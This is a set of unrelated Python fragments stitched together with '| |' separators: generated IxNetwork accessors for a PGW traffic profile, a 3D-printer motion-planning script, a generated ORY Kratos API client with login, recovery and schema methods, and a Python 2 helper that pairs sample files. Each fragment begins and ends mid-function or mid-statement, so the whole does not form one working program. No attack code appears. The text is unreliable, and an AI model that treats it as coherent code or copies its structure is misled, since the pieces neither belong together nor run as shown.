from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocolstack.trafficprofileproxiess5s8pgw_e4ed9c77e8660dfdebbdb4de3e72c6c6 import TrafficProfileProxiesS5S8Pgw
return TrafficProfileProxiesS5S8Pgw(self)
@property
def Apn(self):
"""
Returns
-------
- str: Access Point Name
"""
return self._get_attribute(self._SDM_ATT_MAP['Apn'])
@Apn.setter
def Apn(self, value):
self._set_attribute(self._SDM_ATT_MAP['Apn'], value)
@property
def Apn_AMBRD(self):
"""
Returns
-------
- number: APN aggregated maximum bit rate for downlink. For both spec versions (December '09 and December '10) this value represents kbps and the maximum value that can be encoded is 4,294,967,295 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Apn_AMBRD'])
@Apn_AMBRD.setter
def Apn_AMBRD(self, value):
self._set_attribute(self._SDM_ATT_MAP['Apn_AMBRD'], value)
@property
def Apn_AMBRU(self):
"""
Returns
-------
- number: APN aggregated maximum bit rate for uplink.For both spec versions (December '09 and December '10) this value represents kbps and the maximum value that can be encoded is 4,294,967,295 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Apn_AMBRU'])
@Apn_AMBRU.setter
def Apn_AMBRU(self, value):
self._set_attribute(self._SDM_ATT_MAP['Apn_AMBRU'], value)
@property
def Db_gbrd(self):
"""
Returns
-------
- number: Deprecated. Field is ignored. Kept for TCL BW compatibility
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_gbrd'])
@Db_gbrd.setter
def Db_gbrd(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_gbrd'], value)
@property
def Db_gbru(self):
"""
Returns
-------
- number: Deprecated. Field is ignored. Kept for TCL BW compatibility
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_gbru'])
@Db_gbru.setter
def Db_gbru(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_gbru'], value)
@property
def Db_mbrd(self):
"""
Returns
-------
- number: Maximum bitrate for downlink. For December '09 and December '10 spec versions the maximum value that can be encoded is 1,099,511,627,775 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_mbrd'])
@Db_mbrd.setter
def Db_mbrd(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_mbrd'], value)
@property
def Db_mbru(self):
"""
Returns
-------
- number: Maximum bitrate for uplink. For December '09 and December '10 spec versions the maximum value that can be encoded is 1,099,511,627,775 kbps.
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_mbru'])
@Db_mbru.setter
def Db_mbru(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_mbru'], value)
@property
def Db_pci(self):
"""
Returns
-------
- bool: ARP Preemption Capability
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_pci'])
@Db_pci.setter
def Db_pci(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_pci'], value)
@property
def Db_pl(self):
"""
Returns
-------
- number: ARP Priority Level
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_pl'])
@Db_pl.setter
def Db_pl(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_pl'], value)
@property
def Db_pvi(self):
"""
Returns
-------
- bool: ARP Preemption Vulnerability
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_pvi'])
@Db_pvi.setter
def Db_pvi(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_pvi'], value)
@property
def Db_qci(self):
"""
Returns
-------
- number: QoS Class Identifier
"""
return self._get_attribute(self._SDM_ATT_MAP['Db_qci'])
@Db_qci.setter
def Db_qci(self, value):
self._set_attribute(self._SDM_ATT_MAP['Db_qci'], value)
@property
def DefaultBearerLifetimeTimer(self):
"""
Returns
-------
- number: The time, in seconds, after which the default bearer is deleted
"""
return self._get_attribute(self._SDM_ATT_MAP['DefaultBearerLifetimeTimer'])
@DefaultBearerLifetimeTimer.setter
def DefaultBearerLifetimeTimer(self, value):
self._set_attribute(self._SDM_ATT_MAP['DefaultBearerLifetimeTimer'], value)
@property
def EnableDefaultBearerLifetime(self):
"""
Returns
-------
- bool: If enabled the default bearer will be deleted using the PGW initiated bearer deactivation procedure
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableDefaultBearerLifetime'])
@EnableDefaultBearerLifetime.setter
def EnableDefaultBearerLifetime(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnableDefaultBearerLifetime'], value)
@property
def EnableNIDBCreationDelay(self):
"""
Returns
-------
- bool: Delay Network Initiated Dedicated Bearer(NIDB) Creation
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableNIDBCreationDelay'])
@EnableNIDBCreationDelay.setter
def EnableNIDBCreationDelay(self, value):
self._set_attribute(self._SDM_ATT_MAP['EnableNIDBCreationDelay'], value)
@property
def Enabled(self):
"""
Returns
-------
- bool: Disabled ranges won't be configured nor validated.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def IMSI(self):
"""
Returns
-------
- str: The first International Mobile Subscriber Identifier that will be accepted.
"""
return self._get_attribute(self._SDM_ATT_MAP['IMSI'])
@IMSI.setter
def IMSI(self, value):
self._set_attribute(self._SDM_ATT_MAP['IMSI'], value)
@property
def Ims_apn(self):
"""
Returns
-------
- bool: IMS APN
"""
return self._get_attribute(self._SDM_ATT_MAP['Ims_apn'])
@Ims_apn.setter
def Ims_apn(self, value):
self._set_attribute(self._SDM_ATT_MAP['Ims_apn'], value)
@property
def IpType(self):
"""
Returns
-------
- str: The IP type of the address(es) that will be assigned to the UEs. When choosing IPv4v6 both an IPv4 address and an IPv6 address will be assigned to the UE.
"""
return self._get_attribute(self._SDM_ATT_MAP['IpType'])
@IpType.setter
def IpType(self, value):
self._set_attribute(self._SDM_ATT_MAP['IpType'], value)
@property
def Name(self):
"""
Returns
-------
- str: Name of range
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NidbCreationDelay(self):
"""
Returns
-------
- number: Time to wait (in seconds), from the moment the UE is attached, before sending Create Bearer Request for Network Initiated Dedicated Bearers(NIDB). This does not apply to MS Initiated Dedicated Bearers
"""
return self._get_attribute(self._SDM_ATT_MAP['NidbCreationDelay'])
@NidbCreationDelay.setter
def NidbCreationDelay(self, value):
self._set_attribute(self._SDM_ATT_MAP['NidbCreationDelay'], value)
@property
def ObjectId(self):
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP['ObjectId'])
@property
def ParentPgw(self):
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/vport/.../range): Id of parent PGW range
"""
return self._get_attribute(self._SDM_ATT_MAP['ParentPgw'])
@ParentPgw.setter
def ParentPgw(self, value):
self._set_attribute(self._SDM_ATT_MAP['ParentPgw'], value)
@property
def PoolSize(self):
"""
Returns
-------
- number: The number of UEs that will be accepted.
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolSize'])
@PoolSize.setter
def PoolSize(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolSize'], value)
@property
def PoolStartIPv4(self):
"""
Returns
-------
- str: The first IPv4 address to be assigned to an UE.
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolStartIPv4'])
@PoolStartIPv4.setter
def PoolStartIPv4(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolStartIPv4'], value)
@property
def PoolStartIPv6(self):
"""
Returns
-------
- str: The first IPv6 address to be assigned to an UE.
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolStartIPv6'])
@PoolStartIPv6.setter
def PoolStartIPv6(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolStartIPv6'], value)
@property
def PoolStartIp(self):
"""
Returns
-------
- str: Obsolete - use poolStartIPv4 or poolStartIPv6
"""
return self._get_attribute(self._SDM_ATT_MAP['PoolStartIp'])
@PoolStartIp.setter
def PoolStartIp(self, value):
self._set_attribute(self._SDM_ATT_MAP['PoolStartIp'], value)
@property
def RoundRobinDistribution(self):
"""
Returns
-------
- bool: Distribute the IMSIs on the assigned ports in a round-robin manner (E.g.: When having 3 IMSIs to distribute and 2 ports assigned the first IMSI will be distributed on the first port, the second one on the second port and the 3rd one on the first port)
"""
return self._get_attribute(self._SDM_ATT_MAP['RoundRobinDistribution'])
@RoundRobinDistribution.setter
def RoundRobinDistribution(self, value):
self._set_attribute(self._SDM_ATT_MAP['RoundRobinDistribution'], value)
@property
def TotalCount(self):
"""
Returns
-------
- number: Layer 7 Server Count On All Ports
"""
return self._get_attribute(self._SDM_ATT_MAP['TotalCount'])
@TotalCount.setter
def TotalCount(self, value):
self._set_attribute(self._SDM_ATT_MAP['TotalCount'], value)
@property
def UserPlaneIPv4Address(self):
"""
Returns
-------
- str: The first IPv4 address to be used by the L4-7 server activies.
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIPv4Address'])
@UserPlaneIPv4Address.setter
def UserPlaneIPv4Address(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIPv4Address'], value)
@property
def UserPlaneIPv6Address(self):
"""
Returns
-------
- str: The first IPv6 address to be used by the L4-7 server activies.
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIPv6Address'])
@UserPlaneIPv6Address.setter
def UserPlaneIPv6Address(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIPv6Address'], value)
@property
def UserPlaneIpAddress(self):
"""
Returns
-------
- str: Obsolete - use userPlaneIPv4Address or userPlaneIPv6Address
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIpAddress'])
@UserPlaneIpAddress.setter
def UserPlaneIpAddress(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIpAddress'], value)
@property
def UserPlaneIpCount(self):
"""
Returns
-------
- number: Layer 7 Server Count Per Port
"""
return self._get_attribute(self._SDM_ATT_MAP['UserPlaneIpCount'])
@UserPlaneIpCount.setter
def UserPlaneIpCount(self, value):
self._set_attribute(self._SDM_ATT_MAP['UserPlaneIpCount'], value)
def update(self, Apn=None, Apn_AMBRD=None, | |
import math
# for i in range(10):
# blocks.append({"x":i*10, "y":i*10, "v":minVel})
def solveTimeEq(initialVel, dist, acc):
if dist == 0:
print("solveTimeEq: initialVel", initialVel, "dist", dist, "acc", acc, "time=", 0)
return 0
if acc == 0:
timeA = abs(dist / initialVel)
print("solveTimeEq: initialVel", initialVel, "dist", dist, "acc", acc, "time=", timeA)
return timeA
# Solving this using quadratic formula we get
# timeInBlock = - Uend +/- sqrt(Uend^2 + (2*dist*acceleration)) / acceleration
timeA = (- initialVel + math.sqrt((initialVel * initialVel) + (2 * dist * acc))) / acc
timeB = (- initialVel - math.sqrt((initialVel * initialVel) + (2 * dist * acc))) / acc
print("solveTimeEq: initialVel", initialVel, "dist", dist, "acc", acc, "time=", max(timeA, timeB))
return max(timeA, timeB)
def withinBounds(val, minBound, maxBound):
if val < minBound:
return minBound
if val > maxBound:
return maxBound
return val
# Assume the units are mm, mm/sec and mm/sec^2 which is commonly used in 3D printers
class AxisParams:
def __init__(self, minVel = 1, maxVel = 100, maxAcc = 10, maxErr=0.1):
self.minVel = minVel
self.maxVel = maxVel
self.maxAcc = maxAcc
self.maxErr = maxErr
class AxisValue:
def __init__(self, x=0, y=0, z=0):
self.val = [x, y, z]
self.valid = [1, 1, 1]
def set(self, x, y, z):
self.val = [x, y, z]
self.valid = [1, 1, 1]
def toString(self):
return "x {:.2f} y {:.2f} z {:.2f}".format(self.val[0], self.val[1], self.val[2])
def copy(self):
return AxisValue(self.val[0], self.val[1], self.val[2])
class MotionBlock:
def __init__(self, fromPoint, toPoint, entryVel = AxisValue(), exitVel = AxisValue(), acc = AxisValue(), blkTime = 0):
self.frm = fromPoint.copy()
self.to = toPoint.copy()
self.entryVel = entryVel.copy()
self.exitVel = exitVel.copy()
self.acceleration = acc.copy()
self.blkTime = blkTime
def axisDist(self, axisIdx):
return self.to.val[axisIdx] - self.frm.val[axisIdx]
def toString(self):
st = "From/to " + self.frm.toString() + ", " + self.to.toString()
st += " EntryV/exitV " + self.entryVel.toString() + ", " + self.exitVel.toString()
st += " Acc " + self.acceleration.toString()
st += " Time {:.2f}".format(self.blkTime)
return st
def applyContraints(block, loopIdx, workForwards):
print("..........................")
minAxisTimes = [0 for i in range(MAX_AXES)]
if not workForwards:
blkIdx = len(blocks) - 1 - loopIdx
curBlock = blocks[blkIdx]
# Calculate overrun of block on each axis
for axisIdx in range(MAX_AXES):
minAxisTimes[axisIdx] = curBlock.blkTime
axisDist = curBlock.axisDist(axisIdx)
axisEntryVel = curBlock.entryVel.val[axisIdx]
# Is there a change of direction in the current block
if (axisEntryVel >= 0) != (axisDist >= 0):
# Calculate distance travelled away from intended point
timeTravellingWrongDirn = abs(axisEntryVel / axisParams[axisIdx].maxAcc)
# Since the minBlockTime is based on all axes this could overshoot ...
if timeTravellingWrongDirn > curBlock.blkTime:
print("Block", blkIdx, "Axis", axisIdx, "Time travelling in wrong direction > minBlockTime ...",
timeTravellingWrongDirn, ">", curBlock.blkTime)
timeTravellingWrongDirn = curBlock.blkTime
distanceInWrongDirn = abs(axisEntryVel) * timeTravellingWrongDirn \
- 0.5 * axisParams[axisIdx].maxAcc * timeTravellingWrongDirn ** 2
print("Block", blkIdx, "Axis", axisIdx, "Overshoot! time", timeTravellingWrongDirn, "dist",
distanceInWrongDirn)
if distanceInWrongDirn > axisParams[axisIdx].maxErr:
# Calculate max entry vel to fix this problem
maxEntryVel = math.sqrt(abs(2 * axisParams[axisIdx].maxAcc * axisDist))
print("New entry vel", maxEntryVel)
curBlock.entryVel.val[axisIdx] = maxEntryVel
changesMade = True
if blkIdx != 0:
blocks[blkIdx-1].exitVel.val[axisIdx] = maxEntryVel
# Recalculate time for this axis based on any velocity changes
for axisIdx in range(MAX_AXES):
axisDist = curBlock.axisDist(axisIdx)
minAxisTimes[axisIdx] = solveTimeEq(curBlock.entryVel.val[axisIdx], axisDist, curBlock.acceleration.val[axisIdx])
# Find maximum of minTimes for each axis
minBlockTime = 0
for axTime in minAxisTimes:
if minBlockTime < axTime:
minBlockTime = axTime
print("Minimum block time", minBlockTime)
curBlock.blkTime = minBlockTime
# Calculate the acceleration for the block based on any changes to entry velocity, exit velocity, distance and time
for axisIdx in range(MAX_AXES):
axisDist = curBlock.axisDist(axisIdx)
if axisDist != 0:
axisAcc = 2 * (axisDist - curBlock.entryVel.val[axisIdx] * curBlock.blkTime) / curBlock.blkTime**2
# axisAcc = (curBlock.exitVel.val[axisIdx]**2 - curBlock.entryVel.val[axisIdx]**2) / 2 / axisDist
curBlock.acceleration.val[axisIdx] = axisAcc
# timeTravellingWrongDirn = abs(maxEntryVel / axisParams[axisIdx].maxAcc)
# distanceInWrongDirn = abs(maxEntryVel) * timeTravellingWrongDirn \
# - 0.5 * axisParams[axisIdx].maxAcc * timeTravellingWrongDirn ** 2
# print("Block", blkIdx, "Axis", axisIdx, "Overshoot! time", timeTravellingWrongDirn, "dist",
# distanceInWrongDirn)
MAX_AXES = 3
axisParams = [
AxisParams(1, 100, 10, 0.1),
AxisParams(1, 100, 10, 0.1),
AxisParams(1, 100, 10, 0.1)
]
# Length of block (mm) and list of blocks
blkLen = 1
blocks = []
def addBlock(prevBlock, x, y, z):
newBlock = (MotionBlock(prevBlock.to, AxisValue(x, y, z)))
blocks.append(newBlock)
return newBlock
startPos = MotionBlock(AxisValue(0,0,0), AxisValue(0,0,0))
prevBlock = addBlock(startPos, 1, 2, 0)
prevBlock = addBlock(prevBlock, 1, 1, 0)
TEST_AXES = 2
for loopIdx in range(len(blocks)):
blkIdx = loopIdx
curBlock = blocks[blkIdx]
# Get prev block or initial block
if blkIdx > 0:
prevBlock = blocks[blkIdx-1]
else:
prevBlock = startPos
print("..........................")
print("Entry Vel", prevBlock.exitVel.toString())
curBlock.entryVel = prevBlock.exitVel.copy()
# Iterate each axis
minAxisTimes = [0 for i in range(MAX_AXES)]
for axisIdx in range(TEST_AXES):
# distance in the block
axisDist = curBlock.axisDist(axisIdx)
axisEntryVel = curBlock.entryVel.val[axisIdx]
print("Block", blkIdx, "AxisIdx", axisIdx, "From", curBlock.frm.val[axisIdx], "To", curBlock.to.val[axisIdx], "Dist", axisDist)
# Go with max acceleration in the direction of travel
# Also check if velocity is in same direction as travel and, if so, check if we're already at max velocity
# and set acceleration to zero if so
# This neglects the fact that we might accelerate beyond max in this block but hopefully the block is small so
# this won't be a significant overrun
testAcc = axisParams[axisIdx].maxAcc if axisDist >= 0 else -axisParams[axisIdx].maxAcc
if (axisEntryVel >= 0) == (axisDist >= 0):
if abs(axisEntryVel) >= axisParams[axisIdx].maxVel:
testAcc = 0
curBlock.acceleration.val[axisIdx] = testAcc
# Solve the distance equation to get a minimum time for each direction
minAxisTimes[axisIdx] = solveTimeEq(curBlock.entryVel.val[axisIdx], axisDist, testAcc)
print("testAcc", testAcc, "minTime", minAxisTimes[axisIdx])
# Find maximum of minTimes for each axis
minBlockTime = 0
for axTime in minAxisTimes:
if minBlockTime < axTime:
minBlockTime = axTime
print("Minimum block time", minBlockTime)
curBlock.blkTime = minBlockTime
# Now that we know the minimum block time, re-calculate the acceleration and exit velocity
for axisIdx in range(TEST_AXES):
axisEntryVel = curBlock.entryVel.val[axisIdx]
# With known entry velocity, block time and acceleration yield exit velocity
exitVel = axisEntryVel + curBlock.acceleration.val[axisIdx] * minBlockTime
curBlock.exitVel.val[axisIdx] = exitVel
print("Exit Vel", curBlock.exitVel.toString())
# Now repeat backwards
print("-----------------")
print("In reverse")
# Enforce that the exit velocity is zero for the final block in the chain
finalBlock = blocks[len(blocks)-1]
finalBlock.exitVel = AxisValue()
for loopIdx in range(len(blocks)):
applyContraints(blocks, loopIdx, False)
# # Calculate overrun of block on each axis
# for axisIdx in range(MAX_AXES):
# axisDist = curBlock.to.axisDist(axisIdx, prevBlock.to)
# axisEntryVel = curBlock.entryVel.val[axisIdx]
# if (axisEntryVel >= 0) != (axisDist >= 0):
# # Calculate distance travelled away from intended point
# timeTravellingWrongDirn = abs(axisEntryVel / axisParams[axisIdx].maxAcc)
# # Since the minBlockTime is based on all axes this could overshoot ...
# if timeTravellingWrongDirn > minBlockTime:
# print("Block", blkIdx, "Axis", axisIdx, "Time travelling in wrong direction > minBlockTime ...", timeTravellingWrongDirn, ">", minBlockTime)
# timeTravellingWrongDirn = minBlockTime
# distanceInWrongDirn = abs(axisEntryVel) * timeTravellingWrongDirn - 0.5 * axisParams[axisIdx].maxAcc * timeTravellingWrongDirn**2
# print("Block", blkIdx, "Axis", axisIdx, "Overshoot! time", timeTravellingWrongDirn, "dist", distanceInWrongDirn)
#
# if distanceInWrongDirn > axisParams[axisIdx].maxErr:
# # Calculate max entry vel to fix this problem
# maxEntryVel = curBlock.entryVel
#
#
# curBlock["accX"] = testAccX
# curBlock["accY"] = testAccY
# curBlock["blockTime"] = blockTime
# blockTime = max(timeX, timeY)
# # Lets say the time in the block a variable quantity
# # and calculate what's the minimum time we can be in the block
# # for each component of direction
# # The distance travelled dist = Uend * timeInBlock - 0.5 * acceleration * timeInBlock^2
# # This will always be a minimum when acceleration is a maximum + or - value
# # Required sign of acceleration = - sign of distance
# accMinTimeX = -maxAccX
# if distX < 0:
# accMinTimeX = maxAccX
# accMinTimeY = -maxAccY
# if distY < 0:
# accMinTimeY = maxAccY
#
# # Solving this using quadratic formula we get
# # timeInBlock = Uend +/- sqrt(Uend^2 - (2*dist*acceleration)) / acceleration
# timeX = solveTimeEq(exitVelX, distX, accMinTimeX)
# timeY = solveTimeEq(exitVelY, distY, accMinTimeY)
# blockTime = max(timeX, timeY)
#
# print("Time=", blockTime)
#
# # Check for zero time or distance
# if blockTime <= 0 or (distX == 0 and distY == 0):
# prevBlock["exitVelX"] = exitVelX
# prevBlock["exitVelY"] = exitVelX
# curBlock["accX"] = 0
| |
'%s'"
" to method complete_self_service_browser_verification_flow" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request' is set
if self.api_client.client_side_validation and ('request' not in local_var_params or # noqa: E501
local_var_params['request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `request` when calling `complete_self_service_browser_verification_flow`") # noqa: E501
# verify the required parameter 'via' is set
if self.api_client.client_side_validation and ('via' not in local_var_params or # noqa: E501
local_var_params['via'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `via` when calling `complete_self_service_browser_verification_flow`") # noqa: E501
collection_formats = {}
path_params = {}
if 'via' in local_var_params:
path_params['via'] = local_var_params['via'] # noqa: E501
query_params = []
if 'request' in local_var_params and local_var_params['request'] is not None: # noqa: E501
query_params.append(('request', local_var_params['request'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/self-service/browser/flows/verification/{via}/complete', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_schema(self, id, **kwargs): # noqa: E501
"""get_schema # noqa: E501
Get a traits schema definition # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_schema(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID must be set to the ID of schema you want to get (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_schema_with_http_info(id, **kwargs) # noqa: E501
def get_schema_with_http_info(self, id, **kwargs): # noqa: E501
"""get_schema # noqa: E501
Get a traits schema definition # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_schema_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID must be set to the ID of schema you want to get (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_schema" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `get_schema`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/schemas/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_self_service_browser_login_request(self, request, **kwargs): # noqa: E501
"""Get the request context of browser-based login user flows # noqa: E501
This endpoint returns a login request's context with, for example, error details and other information. When accessing this endpoint through ORY Kratos' Public API, ensure that cookies are set as they are required for CSRF to work. To prevent token scanning attacks, the public endpoint does not return 404 status codes. More information can be found at [ORY Kratos User Login and User Registration Documentation](https://www.ory.sh/docs/next/kratos/self-service/flows/user-login-user-registration). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_self_service_browser_login_request(request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str request: Request is the Login Request ID The value for this parameter comes from `request` URL Query parameter sent to your application (e.g. `/login?request=abcde`). (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: LoginRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_self_service_browser_login_request_with_http_info(request, **kwargs) # noqa: E501
def get_self_service_browser_login_request_with_http_info(self, request, **kwargs): # noqa: E501
"""Get the request context of browser-based login user flows # noqa: E501
This endpoint returns a login request's context with, for example, error details and other information. When accessing this endpoint through ORY Kratos' Public API, ensure that cookies are set as they are required for CSRF to work. To prevent token scanning attacks, the public endpoint does not return 404 status codes. More information can be found at [ORY Kratos User Login and User Registration Documentation](https://www.ory.sh/docs/next/kratos/self-service/flows/user-login-user-registration). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_self_service_browser_login_request_with_http_info(request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str request: Request is the Login Request ID The value for this parameter comes from `request` URL Query parameter sent to your application (e.g. `/login?request=abcde`). (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(LoginRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_self_service_browser_login_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'request' is set
if self.api_client.client_side_validation and ('request' not in local_var_params or # noqa: E501
local_var_params['request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `request` when calling `get_self_service_browser_login_request`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'request' in local_var_params and local_var_params['request'] is not None: # noqa: E501
query_params.append(('request', local_var_params['request'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/self-service/browser/flows/requests/login', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LoginRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_self_service_browser_recovery_request(self, request, **kwargs): # noqa: E501
"""Get the request context of browser-based recovery flows # noqa: E501
When accessing this endpoint through ORY Kratos' Public API, ensure that cookies are set as they are required for checking the auth session. To prevent scanning attacks, the public endpoint does not return 404 status codes but instead 403 or 500. More information can be found at [ORY Kratos Account Recovery Documentation](../self-service/flows/password-reset-account-recovery). # noqa: | |
considered as group 2
##the rest will be considered as group 1
##The target =1 means that as long as files include identifier 1, it will be considered as group 2
##the rest will be considered as group 2
id_list=[]
infiles=[]
paired_dict=dict()
for infile in infiles_combine:
infile_name_list=infile.split('_')
infile_id=infile_name_list[0]
if infile_id not in id_list:
paired_dict[infile_id]=["",""]
id_list.append(infile_id)
else:
pass
if target==2:
identifier=identifier2
elif target==1:
identifier=identifier1
else:
print "Error:Wrong Identifier input"
sys.exit()
for infile in infiles_combine:
infile_name_list=infile.split('_')
infile_id=infile_name_list[0]
#print "identifier2, infile and find result: ", identifier2, infile, infile.find(identifier2)
if infile.find(identifier)>0:
paired_dict[infile_id][1]=infile
else:
paired_dict[infile_id][0]=infile
for id_item in id_list:
infiles.append((paired_dict[id_item][0],paired_dict[id_item][1]))
print "Pair1 and Pair 2 is", paired_dict[id_item][0], paired_dict[id_item][1]
return infiles
def generate_paired_files(infiles_combine,identifier1,identifier2,target=2,unique_ID_length=2,file_name_sep_char="_"):
##the requirement of this function is that both files have the same sample id location
##which is the first position separated by the "_"
##The target =2 means that as long as files include identifier 2, it will be considered as group 2
##the rest will be considered as group 1
##The target =1 means that as long as files include identifier 1, it will be considered as group 2
##the rest will be considered as group 2
id_list=[]
infiles=[]
paired_dict=dict()
for infile in infiles_combine:
infile_name_list=infile.split(file_name_sep_char)
for index in range(unique_ID_length):
if index == 0:
infile_id=infile_name_list[index]
else:
infile_id=infile_id+file_name_sep_char+infile_name_list[index]
if infile_id not in id_list:
paired_dict[infile_id]=["",""]
id_list.append(infile_id)
else:
pass
if target==2:
identifier=identifier2
elif target==1:
identifier=identifier1
